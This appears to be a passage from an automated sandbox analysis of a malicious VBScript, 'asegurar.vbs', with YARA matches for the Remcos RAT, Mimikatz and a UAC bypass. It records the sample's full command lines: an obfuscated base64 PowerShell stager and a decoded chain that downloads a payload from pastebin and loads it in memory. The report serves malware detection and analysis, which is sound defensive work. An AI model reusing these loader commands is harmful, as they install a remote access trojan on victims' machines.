                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0044DA498_2_0044DA49
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00427AD78_2_00427AD7
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041DBF38_2_0041DBF3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00427C408_2_00427C40
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00437DB38_2_00437DB3
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00435EEB8_2_00435EEB
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0043DEED8_2_0043DEED
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_00426E9F8_2_00426E9F
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00402093 appears 50 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00401E65 appears 34 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434E70 appears 54 times
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: String function: 00434801 appears 41 times
                    Source: asegurar.vbsInitial sample: Strings found which are bigger than 50
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2620
                    Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 2620Jump to behavior
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.AddInProcess32.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 8.2.AddInProcess32.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 3.2.powershell.exe.260356ab680.4.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.260356ab680.4.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_RawPaste_Reverse_URL author = ditekSHen, description = Detects executables (downloaders) containing reversed URLs to raw contents of a paste
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_DLAgent09 author = ditekSHen, description = Detects known downloader agent
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
                    Source: 00000008.00000002.2959285882.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
                    Source: 00000003.00000002.1927741950.0000026035520000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 00000003.00000002.1927741950.0000026035581000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 3548, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: Invoke_Mimikatz date = 2016-08-03, hash1 = f1a499c23305684b9b1310760b19885a472374a286e2f371596ab66b77f6ab67, author = Florian Roth, description = Detects Invoke-Mimikatz String, reference = https://github.com/clymb3r/PowerShell/tree/master/Invoke-Mimikatz, license = https://creativecommons.org/licenses/by-nc/4.0/
                    Source: Process Memory Space: powershell.exe PID: 980, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                    Source: Process Memory Space: AddInProcess32.exe PID: 7372, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26026fe03e0.3.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.260254f0000.0.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.260254f0000.0.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2603d9b0000.5.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2603d9b0000.5.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.2602596b090.1.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26025b147d0.2.raw.unpack, h.csCryptographic APIs: 'CreateDecryptor'
                    Source: 3.2.powershell.exe.26025b147d0.2.raw.unpack, au.csCryptographic APIs: 'CreateDecryptor'
                    Source: classification engineClassification label: mal100.rans.troj.spyw.expl.evad.winVBS@14/10@5/5
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041798D GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,GetLastError,8_2_0041798D
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0040F4AF GetModuleFileNameW,CreateToolhelp32Snapshot,Process32FirstW,Process32NextW,CloseHandle,CloseHandle,8_2_0040F4AF
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041B539 FindResourceA,LoadResource,LockResource,SizeofResource,8_2_0041B539
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeCode function: 8_2_0041AADB OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle,8_2_0041AADB
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCacheJump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exeMutant created: \Sessions\1\BaseNamedObjects\Rmc-T0UVJ0
                    Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3120:120:WilError_03
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_mipky4am.ds4.ps1Jump to behavior
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                    Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                    Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                    Source: asegurar.vbsReversingLabs: Detection: 15%
                    Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\asegurar.vbs"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) ;[System.AppDomain]::CurrentDomain.Load($dtveb).GetType('TehulchesXxXxx.Class1').GetMethod('MsqBIbY').Invoke($null, [object[]] ('0/f2krR/d/ee.etsap//:sptth' , $evomn , '____________________________________________-------', $jdbfk, '1', 'Roda' ));"
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\PING.EXE "C:\Windows\system32\PING.EXE" 127.0.0.1
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -encodedCommand JABmACAAPQAgACgAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAgACsAIAAnAGQAbABsADAAMQAuAHQAeAB0ACcAKQAgADsAJABRAFAAdABhAHYAIAA9ACAAKAAgAEcAZQB0AC0AQwBvAG4AdABlAG4AdAAgAC0AUABhAHQAaAAgACQAZgAgACkAIAA7AEkAbgB2AG8AawBlAC0AVwBlAGIAUgBlAHEAdQBlAHMAdAAgAC0AVQBSAEkAIAAkAFEAUAB0AGEAdgAgAC0ATwB1AHQARgBpAGwAZQAgACQAZgAgAC0AVQBzAGUAQgBhAHMAaQBjAFAAYQByAHMAaQBuAGcA -inputFormat xml -outputFormat text
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe"
                    Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $IuJUJJZz = 'WwBT?Hk?cwB0?GU?bQ?u?E4?ZQB0?C4?UwBl?HI?dgBp?GM?ZQBQ?G8?aQBu?HQ?TQBh?G4?YQBn?GU?cgBd?Do?OgBT?GU?YwB1?HI?aQB0?Hk?U?By?G8?d?Bv?GM?bwBs?C??PQ?g?Fs?UwB5?HM?d?Bl?G0?LgBO?GU?d??u?FM?ZQBj?HU?cgBp?HQ?eQBQ?HI?bwB0?G8?YwBv?Gw?V?B5?H??ZQBd?Do?OgBU?Gw?cw?x?DI?Ow?k?EM?QwBS?Gg?bQ?g?D0?I??n?Gg?d?B0?H??cw?6?C8?LwBw?GE?cwB0?GU?YgBp?G4?LgBj?G8?bQ?v?HI?YQB3?C8?Sg?2?HU?UgBq?Fo?cgB2?Cc?I??7?CQ?Zg?g?D0?I??o?Fs?UwB5?HM?d?Bl?G0?LgBJ?E8?LgBQ?GE?d?Bo?F0?Og?6?Ec?ZQB0?FQ?ZQBt?H??U?Bh?HQ?a??o?Ck?I??r?C??JwBk?Gw?b??w?DE?LgB0?Hg?d??n?Ck?I??7?Ek?bgB2?G8?awBl?C0?VwBl?GI?UgBl?HE?dQBl?HM?d??g?C0?VQBS?Ek?I??k?EM?QwBS?Gg?bQ?g?C0?TwB1?HQ?RgBp?Gw?ZQ?g?CQ?Zg?g?C0?VQBz?GU?QgBh?HM?aQBj?F??YQBy?HM?aQBu?Gc?I??7?GM?bQBk?C4?ZQB4?GU?I??v?GM?I??7?H??aQBu?Gc?I??x?DI?Nw?u?D??Lg?w?C4?MQ?g?Ds?c?Bv?Hc?ZQBy?HM?a?Bl?Gw?b??u?GU?e?Bl?C??LQBj?G8?bQBt?GE?bgBk?C??ew?k?GY?I??9?C??K?Bb?FM?eQBz?HQ?ZQBt?C4?SQBP?C4?U?Bh?HQ?a?Bd?Do?OgBH?GU?d?BU?GU?bQBw?F??YQB0?Gg?K??p?C??Kw?g?Cc?Z?Bs?Gw?M??x?C4?d?B4?HQ?Jw?p?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?SQBu?HY?bwBr?GU?LQBX?GU?YgBS?GU?cQB1?GU?cwB0?C??LQBV?FI?SQ?g?CQ?UQBQ?HQ?YQB2?C??LQBP?HU?d?BG?Gk?b?Bl?C??J?Bm?C??LQBV?HM?ZQBC?GE?cwBp?GM?U?Bh?HI?cwBp?G4?ZwB9?C??Ow?k?FE?U?B0?GE?dg?g?D0?I??o?C??RwBl?HQ?LQBD?G8?bgB0?GU?bgB0?C??LQBQ?GE?d?Bo?C??J?Bm?C??KQ?g?Ds?J?Bq?GQ?YgBm?Gs?I??9?C??Jw?w?Cc?I??7?CQ?ZQB2?G8?bQBu?C??PQ?g?Cc?JQBK?Gs?UQBh?HM?R?Bm?Gc?cgBU?Gc?JQ?n?C??OwBb?EI?eQB0?GU?WwBd?F0?I??k?GQ?d?B2?GU?Yg?g?D0?I?Bb?HM?eQBz?HQ?ZQBt?C4?QwBv?G4?dgBl?HI?d?Bd?Do?OgBG?HI?bwBt?EI?YQBz?GU?Ng?0?FM?d?By?Gk?bgBn?Cg?I??k?FE?U?B0?GE?dg?u?HI?ZQBw?Gw?YQBj?GU?K??n?CQ?J??n?Cw?JwBB?Cc?KQ?g?Ck?I??7?Fs?UwB5?HM?d?Bl?G0?LgBB?H??c?BE?G8?bQBh?Gk?bgBd?Do?OgBD?HU?cgBy?GU?bgB0?EQ?bwBt?GE?aQBu?C4?T?Bv?GE?Z??o?CQ?Z?B0?HY?ZQBi?Ck?LgBH?GU?d?BU?Hk?c?Bl?Cg?JwBU?GU?a?B1?Gw?YwBo?GU?cwBY?Hg?W?B4?Hg?LgBD?Gw?YQBz?HM?MQ?n?Ck?LgBH?GU?d?BN?GU?d?Bo?G8?Z??o?Cc?TQBz?HE?QgBJ?GI?WQ?n?Ck?LgBJ?G4?dgBv?Gs?ZQ?o?CQ?bgB1?Gw?b??s?C??WwBv?GI?agBl?GM?d?Bb?F0?XQ?g?Cg?Jw?w?C8?Zg?y?Gs?cgBS?C8?Z??v?GU?ZQ?u?GU?d?Bz?GE?c??v?C8?OgBz?H??d?B0?Gg?Jw?g?Cw?I??k?GU?dgBv?G0?bg?g?Cw?I??n?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?XwBf?F8?Xw?t?C0?LQ?t?C0?LQ?t?Cc?L??g?CQ?agBk?GI?ZgBr?Cw?I??n?DE?Jw?s?C??JwBS?G8?Z?Bh?Cc?I??p?Ck?Ow?=';$Yolopolhggobek = [system.Text.Encoding]::Unicode.GetString( [system.Convert]::FromBase64String( $IuJUJJZz.replace('?','A') ) );$Yolopolhggobek = $Yolopolhggobek.replace('%JkQasDfgrTg%', 'C:\Users\user\Desktop\asegurar.vbs');powershell $Yolopolhggobek;Jump to behavior
                    Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12;$CCRhm = 'https://pastebin.com/raw/J6uRjZrv' ;$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;Invoke-WebRequest -URI $CCRhm -OutFile $f -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$f = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$QPtav = ( Get-Content -Path $f ) ;Invoke-WebRequest -URI $QPtav -OutFile $f -UseBasicParsing} ;$QPtav = ( Get-Content -Path $f ) ;$jdbfk = '0' ;$evomn = 'C:\Users\user\Desktop\asegurar.vbs' ;[Byte[]] $dtveb = [system.Convert]::FromBase64String( $QPtav.replace('$$','A') ) 